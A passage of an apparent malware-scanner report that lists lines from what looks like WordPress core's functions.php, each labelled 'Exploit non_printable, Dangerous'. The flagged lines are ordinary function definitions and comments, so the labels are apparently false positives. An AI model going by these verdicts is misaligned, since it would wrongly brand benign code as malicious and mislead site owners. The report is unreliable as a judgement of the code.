<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$util</span><span style="color: #007700">-></span><span style="color: #0000BB">sort</span><span style="color: #007700">( </span><span style="color: #0000BB">$orderby</span><span style="color: #007700">, </span><span style="color: #0000BB">$order</span><span style="color: #007700">, </span><span style="color: #0000BB">$preserve_keys </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_maybe_load_widgets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5419</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a falsey value from the filter will effectively short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_widgets_add_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_ob_end_flush_all</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">was backported to WordPress 2.3.2</span><span style="color: #007700">, </span><span style="color: #0000BB">but originally was added</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5493</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dead_db</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5514</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function as </span><span style="color: #0000BB">deprecated </span><span style="color: #007700">and </span><span style="color: #0000BB">inform when it has been used</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5516</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_run</span><span style="color: #DD0000">'} hook that will be called that can be used</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">called the deprecated </span><span style="color: #007700">function.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used in every </span><span style="color: #007700">function </span><span style="color: #0000BB">that is deprecated</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is no longer marked </span><span style="color: #007700">as </span><span style="color: #DD0000">"private"</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name The </span><span style="color: #007700">function </span><span style="color: #0000BB">that was called</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that should have been called</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5542</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_run</span><span style="color: #DD0000">', $function_name, $replacement, $version );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5549</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_trigger_error</span><span style="color: #DD0000">', true ) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5552</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'__' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">. */</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5556</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">! Use %</span><span style="color: #0000BB">3$s instead</span><span style="color: #007700">.</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">: </span><span style="color: #0000BB">Version number</span><span style="color: #007700">. */</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s with no alternative available</span><span style="color: #007700">.</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5572</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">! Use %</span><span style="color: #0000BB">3$s instead</span><span style="color: #007700">.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s with no alternative available</span><span style="color: #007700">.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(), </span><span style="color: #0000BB">but with different strings</span><span style="color: #007700">. </span><span style="color: #0000BB">Used to</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used in every PHP4</span><span style="color: #007700">-</span><span style="color: #0000BB">style constructor method that is deprecated</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5610</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_deprecated_constructor</span><span style="color: #007700">( </span><span style="color: #0000BB">$class_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$parent_class </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">called the deprecated </span><span style="color: #007700">class.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5684</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used in the </span><span style="color: #007700">class </span><span style="color: #0000BB">constructor </span><span style="color: #007700">for </span><span style="color: #0000BB">every deprecated </span><span style="color: #007700">class.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5694</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_deprecated_class</span><span style="color: #007700">( </span><span style="color: #0000BB">$class_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$replacement </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">format</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$human_readable_duration </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">included the deprecated file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5761</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used in every file that is deprecated</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5773</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_deprecated_file</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$replacement </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 581</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">[] {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">argument </span><span style="color: #007700">as </span><span style="color: #0000BB">deprecated </span><span style="color: #007700">and </span><span style="color: #0000BB">inform when it has been used</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5837</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used whenever a deprecated </span><span style="color: #007700">function </span><span style="color: #0000BB">argument is used</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5838</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is called</span><span style="color: #007700">, </span><span style="color: #0000BB">the argument must be checked </span><span style="color: #007700">for </span><span style="color: #0000BB">whether it was</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5844</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">, </span><span style="color: #DD0000">'3.0.0' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5848</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used the deprecated argument</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5860</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_deprecated_argument</span><span style="color: #007700">( </span><span style="color: #0000BB">$function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5871</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5884</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">: </span><span style="color: #0000BB">Version number</span><span style="color: #007700">, </span><span style="color: #0000BB">3</span><span style="color: #007700">: </span><span style="color: #0000BB">Optional message regarding the change</span><span style="color: #007700">. */</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5885</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called with an argument that is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">! %</span><span style="color: #0000BB">3$s</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_weekstartend</span><span style="color: #007700">( </span><span style="color: #0000BB">$mysqlstring</span><span style="color: #007700">, </span><span style="color: #0000BB">$start_of_week </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5893</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called with an argument that is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s with no alternative available</span><span style="color: #007700">.</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5901</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called with an argument that is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">! %</span><span style="color: #0000BB">3$s</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5908</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called with an argument that is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s with no alternative available</span><span style="color: #007700">.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5927</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is called by the do_action_deprecated</span><span style="color: #007700">() and </span><span style="color: #0000BB">apply_filters_deprecated</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, and </span><span style="color: #0000BB">so generally does not need to be called directly</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
